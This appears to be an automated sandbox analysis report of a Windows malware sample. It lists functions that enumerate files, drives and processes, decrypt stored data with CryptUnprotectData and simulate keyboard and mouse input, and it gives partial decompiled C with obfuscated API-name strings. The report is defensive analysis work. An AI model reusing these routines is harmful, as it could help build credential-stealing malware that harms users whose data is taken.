Uniqueness

Uniqueness Score: -1.00%

Function 00406453, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 204filetimeCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00406492
SetErrorMode.KERNEL32 ref: 004064A1
FindFirstFileW.KERNEL32 ref: 004064B5
FileTimeToSystemTime.KERNEL32 ref: 00406547
WideCharToMultiByte.KERNEL32 ref: 00406617
FindNextFileW.KERNEL32 ref: 00406745
FindClose.KERNEL32 ref: 00406757

Part of subcall function 00405D7D: EnterCriticalSection.KERNEL32 ref: 00405DAD
Part of subcall function 00405D7D: LeaveCriticalSection.KERNEL32 ref: 00405ECC

Part of subcall function 00407F59: free.MSVCRT ref: 00407F6A

Strings

%.2d/%.2d/%d %.2d:%.2d:%.2d, xrefs: 00406534
"B, xrefs: 00406675
, xrefs: 00406568

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: FileFind$ByteCharCriticalMultiSectionTimeWide$CloseEnterErrorFirstLeaveModeNextSystemfree
String ID: $%.2d/%.2d/%d %.2d:%.2d:%.2d$"B
API String ID: 2473485750-57038091
Opcode ID: 3a87355c9401e98f2b6dd8472ebd5ff4394208b68e8698201d5d1cc5e3771088
Instruction ID: 4c70007c882a7ce573aae617e01390b0b466164858f4fbbb4a898ac5e72415b9
Opcode Fuzzy Hash: 3a87355c9401e98f2b6dd8472ebd5ff4394208b68e8698201d5d1cc5e3771088
Instruction Fuzzy Hash: 36A1B2B48087459FD710EF25C18469BBBE4BF84714F01892EF8D897391D7789589CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDD6, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 236stringfileencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00408042: MultiByteToWideChar.KERNEL32 ref: 00408094
Part of subcall function 00408042: _wfopen.MSVCRT ref: 004080AE
Part of subcall function 00408042: fgetpos.MSVCRT ref: 004080F0
Part of subcall function 00408042: fsetpos.MSVCRT ref: 00408126
Part of subcall function 00408042: malloc.MSVCRT ref: 00408132
Part of subcall function 00408042: fread.MSVCRT ref: 00408152
Part of subcall function 00408042: realloc.MSVCRT ref: 00408168
Part of subcall function 00408042: fclose.MSVCRT ref: 00408174

fopen.MSVCRT ref: 0040EE98

Part of subcall function 004074C5: MultiByteToWideChar.KERNEL32 ref: 004074FE
Part of subcall function 004074C5: GetFileAttributesExW.KERNEL32 ref: 00407519

malloc.MSVCRT ref: 0040EEB4
fclose.MSVCRT ref: 0040EEC8
fread.MSVCRT ref: 0040EEE7
fclose.MSVCRT ref: 0040EEEF
CryptUnprotectData.CRYPT32 ref: 0040EFBC
sprintf.MSVCRT ref: 0040F036
strcmp.MSVCRT ref: 0040F046
strcmp.MSVCRT ref: 0040F05A

Strings

!, xrefs: 0040EFD7

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: fclose$ByteCharMultiWidefreadmallocstrcmp$AttributesCryptDataFileUnprotect_wfopenfgetposfopenfsetposreallocsprintf
String ID: !
API String ID: 2596569898-2657877971
Opcode ID: 805cf607740b1a5f9c37050675237c4453e90da5180a7e15037dfd845fdc5026
Instruction ID: 786053efb03fb7134250340436023ef553204ed8f41ee6c066ba5e47f52fe47d
Opcode Fuzzy Hash: 805cf607740b1a5f9c37050675237c4453e90da5180a7e15037dfd845fdc5026
Instruction Fuzzy Hash: FEC1EAB1A053198FDB50DF25C844B9EBBF0BF45308F0588AEE489E7681D7789A84CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0040680D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 168fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00406824
MultiByteToWideChar.KERNEL32 ref: 0040685F
wcscat.MSVCRT ref: 00406872
FindFirstFileW.KERNEL32 ref: 00406885
FindClose.KERNEL32 ref: 004068B2
WideCharToMultiByte.KERNEL32 ref: 00406924
FindNextFileW.KERNEL32 ref: 00406AB7

Strings

"B, xrefs: 004069A4
;/B, xrefs: 00406A5F
8/B, xrefs: 004068D5

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Find$ByteCharFileMultiWide$CloseErrorFirstModeNextwcscat
String ID: 8/B$;/B$"B
API String ID: 1999808103-785463125
Opcode ID: f1dd5b59dd90e2cd6b86d21233615770f5833fe61e03e8d61d53419095457b90
Instruction ID: 3ec7505ef3af3f69d728aa0d249a2e56fce710592115df83b66c59d2158606e8
Opcode Fuzzy Hash: f1dd5b59dd90e2cd6b86d21233615770f5833fe61e03e8d61d53419095457b90
Instruction Fuzzy Hash: CB8102B06093419FD320EF25C18469BBBE4BF85348F45882EE4C997381D7B89589CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00406390, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 004063AF
fopen.MSVCRT ref: 004063DB
_snwprintf.MSVCRT ref: 00406405
fwprintf.MSVCRT ref: 00406415
_snwprintf.MSVCRT ref: 0040641C
FindNextFileW.KERNEL32 ref: 00406428
FindClose.KERNEL32 ref: 00406436
fclose.MSVCRT ref: 00406443

Strings

,/B, xrefs: 004063F0

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Find$File_snwprintf$CloseFirstNextfclosefopenfwprintf
String ID: ,/B
API String ID: 4215708556-1155038791
Opcode ID: 8a012b87caedc31829cbf4f9110065dd04a3999989f632e85736f7b71116f674
Instruction ID: 110ac6783a2aa76cc845fc41d9c104154397b4f26a6f194d14aa4f1c43fee32b
Opcode Fuzzy Hash: 8a012b87caedc31829cbf4f9110065dd04a3999989f632e85736f7b71116f674
Instruction Fuzzy Hash: 7E115BB0509701AEC710AF25898459FFBE4AF80718F018D2EF4D497281D778848A8B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00413A85, Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00413AA4

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

MultiByteToWideChar.KERNEL32 ref: 00413B02
FindFirstFileW.KERNEL32 ref: 00413B18
WideCharToMultiByte.KERNEL32 ref: 00413BB1
WideCharToMultiByte.KERNEL32 ref: 00413CA7
FindNextFileW.KERNEL32 ref: 00413D1B
FindClose.KERNEL32 ref: 00413D3D

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: ByteCharFindMultiWide$File$CloseErrorFirstModeNext_vsnprintf
String ID:
API String ID: 2650927523-0
Opcode ID: 334888fa3b4434e061fa7b69daef3cafc177c312af5b0b50911e5eeb64500dc7
Instruction ID: f6b2b9afb8f28ceff06ae1ca88c29ba9ed65548566ee5afaf2077295461a783a
Opcode Fuzzy Hash: 334888fa3b4434e061fa7b69daef3cafc177c312af5b0b50911e5eeb64500dc7
Instruction Fuzzy Hash: 0971AFB44093459BD320EF6AD18469FBBE0AF84758F008E1EE4D887391D7B89689CF57

Uniqueness

Uniqueness Score: -1.00%

Function 00406084, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 0041236C: malloc.MSVCRT ref: 0041237C

SetErrorMode.KERNEL32 ref: 004060A9
GetLogicalDriveStringsA.KERNEL32 ref: 004060C1
GetVolumeInformationA.KERNEL32 ref: 0040617C
GetDiskFreeSpaceExA.KERNEL32 ref: 004061D3
GetDriveTypeA.KERNEL32 ref: 00406250

Strings

@, xrefs: 00406215

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Drive$DiskErrorFreeInformationLogicalModeSpaceStringsTypeVolumemalloc
String ID: @
API String ID: 4103324456-2766056989
Opcode ID: 6e05202e2b6317dcf9b285d138a61c7554b9cffc0ce9619bb66956b9d9d47aae
Instruction ID: 7bbe8d17847550f4164a14e3f7f2cb4162b00115eb79a228a3fcc10edc21327c
Opcode Fuzzy Hash: 6e05202e2b6317dcf9b285d138a61c7554b9cffc0ce9619bb66956b9d9d47aae
Instruction Fuzzy Hash: EF61ABB0509741AEE300AF26C59435FFBE4BF84748F01882EE4D897251E7B985898F86

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB1C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 0040DB2D

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

FindFirstFileA.KERNEL32 ref: 0040DB6F
FindNextFileA.KERNEL32 ref: 0040DCC6
FindClose.KERNEL32 ref: 0040DCD8

Strings

=9B, xrefs: 0040DBA4
49B, xrefs: 0040DB41

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Find$File$CloseErrorFirstModeNext_vsnprintf
String ID: 49B$=9B
API String ID: 3730131509-1437851871
Opcode ID: 614e9fffcf9219516c0050d8f59d1067c41d6f899a0319c1393b422afb48b831
Instruction ID: d2bbd74eba1eaf649f0bd4c37a8a6416b9e5ed0152e307ea26bcf85ad81135cc
Opcode Fuzzy Hash: 614e9fffcf9219516c0050d8f59d1067c41d6f899a0319c1393b422afb48b831
Instruction Fuzzy Hash: 064108B09083459AD720AF66C58455AFBE4FF85318F00892EA4DCD7381D7B8958ACF4A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D290, Relevance: 9.1, APIs: 6, Instructions: 98encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 0040D2E2
CryptCreateHash.ADVAPI32 ref: 0040D31C
CryptHashData.ADVAPI32 ref: 0040D34B
CryptGetHashParam.ADVAPI32 ref: 0040D38A

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

CryptDestroyHash.ADVAPI32 ref: 0040D3F7
CryptReleaseContext.ADVAPI32 ref: 0040D40D

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease_vsnprintf
String ID:
API String ID: 3013291059-0
Opcode ID: 39854ef80ab4a7fbc3dc680ded39b80eed89874fe177f232a89a79b64462ce99
Instruction ID: 943cf95f321e7325facb401f71863eb3bfed9abde62d642a269049118650948e
Opcode Fuzzy Hash: 39854ef80ab4a7fbc3dc680ded39b80eed89874fe177f232a89a79b64462ce99
Instruction Fuzzy Hash: 7441F5B05083019FD700EF2AC58935FBBE4AF88718F01892EE8C897381D779C5498F96

Uniqueness

Uniqueness Score: -1.00%

Function 00420420, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 217COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00420557
_assert.MSVCRT ref: 004206E6

Strings

jB, xrefs: 004206D7
o, xrefs: 004206CF

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _assert
String ID: jB$o
API String ID: 1222420520-209914815
Opcode ID: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
Instruction ID: 3ee2903d3d2c0e63440c59b9d95d43c21fe2c472ea4d5dc2fd0c85ac53de4ac0
Opcode Fuzzy Hash: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
Instruction Fuzzy Hash: BB919E72A083628FC714CF29D48051AFBE2BFD8314F498A2EE8D59B355D735E945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00402570, Relevance: 6.1, APIs: 4, Instructions: 54processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004025BF
Process32First.KERNEL32 ref: 004025DF
Process32Next.KERNEL32 ref: 00402614
CloseHandle.KERNEL32 ref: 0040261E

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 8705725f05fe9afeeedec4a0c2d3b20b049fa06699c5a5ff1e195fb4d0e9f0db
Instruction ID: dbb4d6dc22455ac6b6b4c8bb6317d27c69ec59bbf57194761826882fdadde184
Opcode Fuzzy Hash: 8705725f05fe9afeeedec4a0c2d3b20b049fa06699c5a5ff1e195fb4d0e9f0db
Instruction Fuzzy Hash: EB1119B0409701AAD710AF15CA856AFFBE8EF80718F008D2FF4C893252D3B99485CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004208C0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 485COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00420C90
_assert.MSVCRT ref: 00420F11

Strings

HjB, xrefs: 00420F02

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _assert
String ID: HjB
API String ID: 1222420520-2248713979
Opcode ID: f62c3d4576d8ad505b0a81f0fa83231c5cc89cc9aafe5267dd7225276671c9f6
Instruction ID: a3441135aa71a6079429eef520cd0e1a6c464effaa05f67e07f9da83f6d0b88a
Opcode Fuzzy Hash: f62c3d4576d8ad505b0a81f0fa83231c5cc89cc9aafe5267dd7225276671c9f6
Instruction Fuzzy Hash: 222288716083A18FC724CF29D49052ABBE1BFC9314F448A6EF9E597356D234EA05CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0040E511, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 0040E645
LocalFree.KERNEL32 ref: 0040E704

Strings

5B, xrefs: 0040E68E

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID: 5B
API String ID: 1561624719-3738334870
Opcode ID: c63f1e79abc16ef90ff5286a14a4e2a9458261c6144f1dd153b029fa06e06a91
Instruction ID: 6f154d43ee89b411a9f17fea58252a0a0f24be58a4641eb8c9eefda1aa91bd9a
Opcode Fuzzy Hash: c63f1e79abc16ef90ff5286a14a4e2a9458261c6144f1dd153b029fa06e06a91
Instruction Fuzzy Hash: 3171BFB05083449FC710DF2AC18475BFBE0BB89348F448D2EE99897391E779D999CB86

Uniqueness

Uniqueness Score: -1.00%

Function 004121EF, Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

APIs

SetCursorPos.USER32 ref: 00412203
mouse_event.USER32 ref: 00412297

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Cursormouse_event
String ID:
API String ID: 1102576784-0
Opcode ID: 02aa775cd51f21a886bada7529a77aa4c4527e8a93dc87a2c038cd1471ca5427
Instruction ID: 2d8ae4a002b4347ec37d14b3ea5e3552e9b4ec24971f98579b9e90b097ea308f
Opcode Fuzzy Hash: 02aa775cd51f21a886bada7529a77aa4c4527e8a93dc87a2c038cd1471ca5427
Instruction Fuzzy Hash: B70184B4009350AAE744AF15C11936FBFE1BB80708F408C5EF4D44A290D3BD8599DB97

Uniqueness

Uniqueness Score: -1.00%

Function 004121C0, Relevance: 1.5, APIs: 1, Instructions: 10
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004121C0(signed char _a4) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _t5;
				signed int* _t6;

				_t5 = _a4 & 0x000000ff;
				_v16 = 0;
				_v20 = 2;
				_v24 = 0;
				 *_t6 = _t5;
				L0041F80C();
				return _t5;
			}

0x004121c3
0x004121c8
0x004121d0
0x004121d8
0x004121e0
0x004121e3
0x004121ee

APIs

keybd_event.USER32 ref: 004121E3

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: keybd_event
String ID:
API String ID: 2665452162-0
Opcode ID: fc0e2f1ce52b91d2f25bab5800c9da4a646e5a4d84648ec4c398f99e0da44be8
Instruction ID: c3d59fdb0b4da9d538631368c5f777f5d3843ca3ad337a3792014ed51d975762
Opcode Fuzzy Hash: fc0e2f1ce52b91d2f25bab5800c9da4a646e5a4d84648ec4c398f99e0da44be8
Instruction Fuzzy Hash: 55D0E9B58087545AD7007F29C15A32ABEE0BB85308F84899DE8D846256E37D82589F97

Uniqueness

Uniqueness Score: -1.00%

Function 0040262F, Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 282
networkCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E0040262F(signed int __ecx, signed int __edx, intOrPtr _a4) {
				char _v608;
				char _v624;
				char _v868;
				char _v876;
				char _v916;
				intOrPtr _v936;
				signed short _v944;
				void* _v948;
				intOrPtr _v964;
				intOrPtr _v968;
				void* _v972;
				intOrPtr _v976;
				void* _v980;
				char _v988;
				int _v996;
				void* _v1000;
				signed short _v1004;
				void* _v1008;
				signed int _v1010;
				signed short _v1012;
				signed short _v1014;
				intOrPtr _v1016;
				signed int _v1018;
				char* _v1020;
				signed short _v1022;
				void* _v1024;
				signed short _v1028;
				void* _v1032;
				signed short _v1036;
				signed int _v1040;
				signed int _v1048;
				signed short _v1052;
				void* _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				char _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t141;
				intOrPtr* _t144;
				void* _t147;
				void* _t150;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t166;
				intOrPtr* _t169;
				void* _t170;
				signed int _t171;
				signed int _t180;
				void* _t184;
				void* _t185;
				signed short _t188;
				void* _t189;
				signed int _t190;
				void* _t194;
				signed int _t195;
				signed int _t208;
				intOrPtr* _t213;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				signed int _t225;
				signed int _t233;
				void** _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed short* _t239;
				void** _t240;
				void* _t241;
				signed int* _t242;

				_t225 = __edx;
				_t222 = __ecx;
				_t239 =  &_v1004;
				E0041236C( &_v944, 0x8000);
				_t139 = E00407F7A(_t225, "iphlpapi.dll");
				_v1020 = "psapi.dll";
				_v976 = _t139;
				_t140 = E00407F7A(_t225);
				_v1020 = "kernel32.dll";
				_v968 = _t140;
				_t141 = E00407F7A(_t225);
				_v1020 = "Ed5jf5dRSdSqYsqCVid";
				_v964 = _t141;
				_t144 = E00407F8E(_t225, _v976, E004081AA());
				_v1020 = "Ed5jf5dRSdSuSsqCVid";
				_t213 = _t144;
				_t147 = E00407F8E(_t225, _v976, E004081AA());
				_v1020 = "Ed590WYd66XlCnd_4idLCldD";
				_v972 = _t147;
				_t150 = E00407F8E(_t225, _v968, E004081AA());
				if(_t150 == 0) {
					_t150 = E00407F8E(_t225, _v964, E004081AA("Ed590WYd66XlCnd_4idLCldD"));
				}
				_t226 = _t225 & 0xffffff00 | _t213 == 0x00000000;
				_t224 = _t222 & 0xffffff00 | _v972 == 0x00000000 | _t225 & 0xffffff00 | _t213 == 0x00000000;
				if((_t222 & 0xffffff00 | _v972 == 0x00000000 | _t225 & 0xffffff00 | _t213 == 0x00000000) != 0 || _t150 == 0) {
					L24:
					_t214 =  &_v944;
					if(_v936 == 0) {
						_v1008 = 0;
						_v1012 = 0;
						_v1016 = 0xe5;
					} else {
						_v1008 = E00412540( &_v944);
						_v1016 = 0xe4;
						_v1012 = _v944;
					}
					E00405D7D(_t226, _a4);
					E004123B1(_t214);
					E00407FAB(_v976);
					E00407FAB(_v968);
					return E00407FAB(_v964);
				} else {
					_t234 =  &_v948;
					_v948 = 0;
					_v1000 = 0;
					_v1004 = 5;
					_v1008 = 2;
					_v1012 = 1;
					_v1016 = _t234;
					_v1020 = 0;
					_t162 =  *_t213();
					_t240 = _t239 - 0x18;
					if(_t162 != 0x7a) {
						L14:
						_t215 =  &_v972;
						_v972 = 0;
						_v1024 = 0;
						_v1028 = 1;
						_v1032 = 2;
						_v1036 = 1;
						_v1040 = _t215;
						 *_t240 = 0;
						_t163 = _v996();
						_t241 = _t240 - 0x18;
						if(_t163 != 0x7a) {
							goto L24;
						}
						_t165 = malloc(_v996);
						_v1000 = _t165;
						if(_t165 == 0) {
							goto L24;
						}
						_v1048 = 0;
						_v1052 = 1;
						_v1056 = 2;
						_v1060 = 1;
						_v1064 = _t215;
						_v1068 = _t165;
						_t166 = _v1020();
						_t242 = _t241 - 0x18;
						if(_t166 != 0) {
							L22:
							if(_v1024 != 0) {
								E00407F59( &_v1024);
							}
							goto L24;
						}
						_t235 = 0;
						_t237 =  &_v876;
						while(1) {
							_t169 = _v1024;
							if(_t235 >=  *_t169) {
								goto L22;
							}
